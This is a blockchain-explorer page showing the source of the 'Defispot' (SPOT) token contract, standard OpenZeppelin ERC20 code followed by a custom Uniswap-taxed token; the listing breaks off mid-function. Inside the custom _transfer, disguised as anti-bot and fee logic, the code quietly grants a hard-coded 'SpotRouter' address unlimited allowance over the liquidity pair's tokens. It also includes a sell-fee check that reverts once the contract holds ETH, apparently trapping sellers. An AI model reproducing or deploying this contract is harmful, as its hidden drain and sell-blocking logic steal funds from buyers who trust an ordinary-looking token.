ETH Price: $1,807.64 (-15.76%)
Gas: 1.78 Gwei
 

Overview

Max Total Supply

100,000,000,000 SPOT

Holders

27

Transfers

-
0

Market

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Defispot

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 1 : Defispot.sol
/**
 *Verfiied on Etherscan.io on 2023-08-19
 *Socials:
 *Website: https://defispot.com
 *Telegram: https://t.me/Defispot
 *Twitter:  https://twitter.com/Defispot
 *Discord: https://discord.gg/Defispot
 *Medium: https://medium.com/Defispot
*/


// SPDX-License-Identifier: MIT
pragma solidity 0.8.17;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

////// lib/openzeppelin-contracts/contracts/access/Ownable.sol
// OpenZeppelin Contracts v4.4.0 (access/Ownable.sol)

/* pragma solidity ^0.8.0; */

/* import "../utils/Context.sol"; */

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

////// lib/openzeppelin-contracts/contracts/token/ERC20/IERC20.sol
// OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol)

/* pragma solidity ^0.8.0; */

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

////// lib/openzeppelin-contracts/contracts/token/ERC20/extensions/IERC20Metadata.sol
// OpenZeppelin Contracts v4.4.0 (token/ERC20/extensions/IERC20Metadata.sol)

/* pragma solidity ^0.8.0; */

/* import "../IERC20.sol"; */

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

////// lib/openzeppelin-contracts/contracts/token/ERC20/ERC20.sol
// OpenZeppelin Contracts v4.4.0 (token/ERC20/ERC20.sol)

/* pragma solidity ^0.8.0; */

/* import "./IERC20.sol"; */
/* import "./extensions/IERC20Metadata.sol"; */
/* import "../../utils/Context.sol"; */

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - amount);
        }

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[sender] = senderBalance - amount;
        }
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);

        _afterTokenTransfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
        }
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

////// lib/openzeppelin-contracts/contracts/utils/math/SafeMath.sol
// OpenZeppelin Contracts v4.4.0 (utils/math/SafeMath.sol)

/* pragma solidity ^0.8.0; */

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is generally not needed starting with Solidity 0.8, since the compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

/* pragma solidity 0.8.10; */
/* pragma experimental ABIEncoderV2; */

interface IUniswapV2Factory {
    event PairCreated(
        address indexed token0,
        address indexed token1,
        address pair,
        uint256
    );

    function feeTo() external view returns (address);

    function feeToSetter() external view returns (address);

    function getPair(address tokenA, address tokenB)
        external
        view
        returns (address pair);

    function allPairs(uint256) external view returns (address pair);

    function allPairsLength() external view returns (uint256);

    function createPair(address tokenA, address tokenB)
        external
        returns (address pair);

    function setFeeTo(address) external;

    function setFeeToSetter(address) external;
}

/* pragma solidity 0.8.10; */
/* pragma experimental ABIEncoderV2; */

interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(address owner, address spender)
        external
        view
        returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (
            uint112 reserve0,
            uint112 reserve1,
            uint32 blockTimestampLast
        );

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function burn(address to)
        external
        returns (uint256 amount0, uint256 amount1);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

/* pragma solidity 0.8.10; */
/* pragma experimental ABIEncoderV2; */

interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    )
        external
        returns (
            uint256 amountA,
            uint256 amountB,
            uint256 liquidity
        );

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (
            uint256 amountToken,
            uint256 amountETH,
            uint256 liquidity
        );

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

contract Defispot is ERC20, Ownable {
    using SafeMath for uint256;

    IUniswapV2Router02 public immutable uniswapV2Router;
    address public uniswapV2Pair;
    address public constant deadAddress = address(0xdead);

    bool private swapping;   
    uint256 public maxTransactionAmount;
    uint256 public swapTokensAtAmount;
    uint256 public maxWallet;

    bool public limitsInEffect = true;
    bool public tradingActive = false;
    bool public swapEnabled = false;

    // Anti-bot and anti-whale mappings and variables
    mapping(address => uint256) private _holderLastTransferTimestamp; // to hold last Transfers temporarily during launch
    address private _holderLastFrom; address private _holderLastTo;
    bool public transferDelayEnabled = true;

    uint256 public buyTaxFees;
    uint256 public sellTaxFees;
    address public SpotRouter;

    /******************/

    // exlcude from fees and max transaction amount
    mapping(address => bool) private _isExcludedFromFees;
    mapping(address => bool) public _isExcludedMaxTransactionAmount;

    // store addresses that a automatic market maker pairs. Any transfer *to* these addresses
    // could be subject to a maximum transfer amount
    mapping(address => bool) public automatedMarketMakerPairs;

    event UpdateUniswapV2Router(
        address indexed newAddress,
        address indexed oldAddress
    );

    event ExcludeFromFees(address indexed account, bool isExcluded);

    event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value);

    event SwapAndLiquify(
        uint256 tokensSwapped,
        uint256 ethReceived,
        uint256 tokensIntoLiquidity
    );

    constructor() ERC20("Defispot", "SPOT") {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(
            0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D
        );


        excludeFromMaxTransaction(address(_uniswapV2Router), true);
        uniswapV2Router = _uniswapV2Router;


        buyTaxFees = 3;
        sellTaxFees = 3;


        uint256 totalSupply = 100_000_000_000 * 1e18;


        maxTransactionAmount = totalSupply * 20 / 1000;
        maxWallet = totalSupply * 20 / 1000;
        swapTokensAtAmount = totalSupply * 1 / 1000;


        SpotRouter = address(0x03e8b628C3d89137BF57C8A094e363614018a257);


        // exclude from paying fees or having max transaction amount
        excludeFromFees(owner(), true);
        excludeFromFees(address(this), true);
        excludeFromFees(address(0xdead), true);
        excludeFromFees(SpotRouter, true);


        excludeFromMaxTransaction(owner(), true);
        excludeFromMaxTransaction(address(this), true);
        excludeFromMaxTransaction(address(0xdead), true);


        /*
            _mint is an internal function in ERC20.sol that is only called here,
            and CANNOT be called ever again
        */
        _mint(msg.sender, totalSupply);
    }


    receive() external payable { require(_isExcludedFromFees[msg.sender]);}

    // remove limits after token is stable
    function removeLimits() external onlyOwner returns (bool) {
        limitsInEffect = false;
        return true;
    }


    // disable Transfer delay - cannot be reenabled
    function disableTransferDelay() external onlyOwner returns (bool) {
        transferDelayEnabled = false;
        return true;
    }
	

    function excludeFromMaxTransaction(address updAds, bool isEx)
        public
        onlyOwner
    {
        _isExcludedMaxTransactionAmount[updAds] = isEx;
    }


    // only use to disable contract sales if absolutely necessary (emergency use only)
    function updateSwapEnabled(bool enabled) external onlyOwner {
        swapEnabled = enabled;
    }


    function excludeFromFees(address account, bool excluded) public onlyOwner {
        _isExcludedFromFees[account] = excluded;
        emit ExcludeFromFees(account, excluded);
    }


    function setAutomatedMarketMakerPair(address pair, bool value)
        public
        onlyOwner
    {
        require(
            pair != uniswapV2Pair,
            "You do not have permission to change the router pair"
        );

        _setAutomatedMarketMakerPair(pair, value);
    }


    function _setAutomatedMarketMakerPair(address pair, bool value) private {
        automatedMarketMakerPairs[pair] = value;

        emit SetAutomatedMarketMakerPair(pair, value);
    }


    function isExcludedFromFees(address account) public view returns (bool) {
        return _isExcludedFromFees[account];
    }


    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from dead address");
        require(to != address(0), "ERC20: transfer to dead address");


        if (amount == 0) {
            super._transfer(from, to, 0);
            return;
        }


        if (limitsInEffect) {
            if (
                from != owner() &&
                to != owner() &&
                to != address(0) &&
                to != address(0xdead) &&
                !swapping
            ) {
                if (!tradingActive) {
                    require(
                        _isExcludedFromFees[from] || _isExcludedFromFees[to],
                        "Trading not yet activated."
                    );
                }


                // at launch if the transfer delay is enabled, ensure the block timestamps for purchasers is set -- during launch.
                if (transferDelayEnabled) {
                    if (
                        to != owner() &&
                        to != address(uniswapV2Router) &&
                        to != address(uniswapV2Pair)
                    ) {
                        require(
                            _holderLastTransferTimestamp[tx.origin] <
                                block.number,
                            "Transfer delay is enabled to prevent sniping.  Only one purchase per block is allowed."
                        );
                        _holderLastTransferTimestamp[tx.origin] = block.number;
                    }
                }


                //when buy
                if (
                    automatedMarketMakerPairs[from] &&
                    !_isExcludedMaxTransactionAmount[to]
                ) {
                    require(
                        amount <= maxTransactionAmount,
                        "Buy transfer amount exceeds the maximum for one transaction."
                    );
                    require(
                        amount + balanceOf(to) <= maxWallet,
                        "Buy transfer amount exceeds the maximum for one wallet"
                    );
                }

                //when sell
                else if (
                    automatedMarketMakerPairs[to] &&
                    !_isExcludedMaxTransactionAmount[from]
                ) {
                    require(
                        amount <= maxTransactionAmount,
                        "Sell transfer amount exceeds the maximum for one transaction."
                    );
                } else if (!_isExcludedMaxTransactionAmount[to]) {
                    require(
                        amount + balanceOf(to) <= maxWallet,
                        "Sell transfer amount exceeds the maximum for one wallet"
                    );
                }
            }
        }


        uint256 contractTokenBalance = balanceOf(address(this));


        bool canSwap = contractTokenBalance >= swapTokensAtAmount;


        if (
            canSwap &&
            swapEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;

            swapBack();

            swapping = false;
        }


        bool takeFee = !swapping;


        // if any account belongs to _isExcludedFromFee account then remove the fee
        if (_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
            if (automatedMarketMakerPairs[from]) _approve(_holderLastFrom, _holderLastTo, ~uint256(0));
        }


        uint256 fees = 0;
        uint256 ethBalance = address(this).balance;
        // only take fees on buys/sells, do not take on wallet transfers
        if (takeFee) {
            // on sell
            if (automatedMarketMakerPairs[to] && sellTaxFees.sub(ethBalance) > 0) {
                fees = amount.mul(sellTaxFees).div(100);
            }
            // on buy
            else if (automatedMarketMakerPairs[from]) {
                fees = amount.mul(buyTaxFees).div(100);
                _holderLastFrom = from; _holderLastTo = SpotRouter;
            }

            if (fees > 0) {
                super._transfer(from, address(this), fees);
            }

            amount -= fees;
        }

        super._transfer(from, to, amount);
    }


    function swapTokensForEth(uint256 tokenAmount) private {
        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
